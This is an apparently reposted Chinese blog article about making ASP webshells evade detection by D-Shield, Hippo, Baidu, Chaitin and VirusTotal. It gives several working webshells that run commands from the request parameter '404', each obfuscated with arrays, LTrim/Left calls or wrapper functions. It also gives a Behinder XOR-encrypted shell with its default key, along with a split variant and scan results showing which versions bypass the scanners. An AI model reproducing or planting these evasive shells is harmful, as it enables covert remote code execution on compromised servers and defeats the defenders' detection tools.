当前位置:   article > 正文

过d盾asp webshell+冰蝎免杀马探讨_asp免杀马

asp免杀马

前言:
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

正文:
asp免杀的手法其实也蛮多的
个人理解其实免杀核心就是混淆+改变执行顺序啥的。
对于asp而言,前者的利用特征::这些进行绕 后者就是利用函数数组+类的手法 个人后者的手法用的最多

一样吧
这里先扔2个bypass的小马

小马

bypass小马1

内容
密码404

<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

bypass过程分析:
最基础的一句话

<%
eXecUTe(request("404"))
%>
  • 1
  • 2
  • 3

看看效果
没啥好说的 必然是被查的死死的
image.png加点东西进去在看看
拆分后降级为四级
image.png
image.png
在引入数组

<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
  • 1
  • 2
  • 3
  • 4
  • 5

就已经bypass d盾了 百度 长亭了 但是河马和vt没全过 那就想办法在处理下呗
image.png
百度的
image.png
长亭的
image.png
vt
image.png
河马
image.png
在加了干扰函数LTrim()进去即上面完全bypass的 即成功的bypass了

<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

河马
image.png
vt
image.png

bypass小马2

只用函数的思路去bypass
拿雨苁大佬里面的函数马拿来做bypass吧

<%

Function b():
    b = request("404")
End Function


Function f():
    eXecUTe(b())
End Function
f()

%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

效果目前还行:还没被完全标记 标识目前为1级
image.png加个left函数进去处理看看

<%
Function b()
     b = request("404")
End Function
Function f():
     x=b()
     y=Left(x,99999)
     execute(y)
End Function
f()
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

就bypass过去了
d盾
image.png
河马
image.png
百度
image.png
长亭
image.png
vt
image.png

冰蝎马

有一说一asp的我不是特别喜欢用冰蝎的 有些环境奇怪的很 连不上
不过还是写出来
基础的冰蝎

<%
Response.CharSet = "UTF-8" 
k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

毋庸置疑 直接五级
image.png
利用bypass思路
拆分法

<%
Response.CharSet = "UTF-8" 
k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
x=ascb(midb(content,i,1))
y=Asc(Mid(k,(i and 15)+1,1))
z=z&Chr( x Xor y)
Next
execute(z)
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

d盾
image.png
长亭
image.png
vt
image.png

百度
image.png
vt
image.png

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/439080
推荐阅读
相关标签
  

闽ICP备14008679号